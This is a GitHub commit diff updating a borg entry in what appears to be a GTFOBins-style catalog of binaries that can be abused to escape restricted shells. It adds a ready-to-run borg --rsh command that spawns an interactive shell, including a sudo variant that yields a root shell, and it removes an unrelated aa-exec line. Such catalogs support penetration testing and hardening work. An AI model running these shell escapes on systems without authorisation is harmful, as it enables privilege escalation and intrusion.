Update borg.md

This commit is contained in:
JM Sanchez 2024-08-19 00:11:40 +08:00 committed by GitHub
parent 8bcef2711f
commit 7b2b58eab4
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

View File

@ -4,5 +4,6 @@ functions:
- code: >
borg extract @:/::: --rsh "sh -c 'sh </dev/tty >/dev/tty 2>/dev/tty'"
sudo:
- code: sudo aa-exec /bin/sh
- code: >
sudo borg extract @:/::: --rsh "sh -c 'sh </dev/tty >/dev/tty 2>/dev/tty'"
---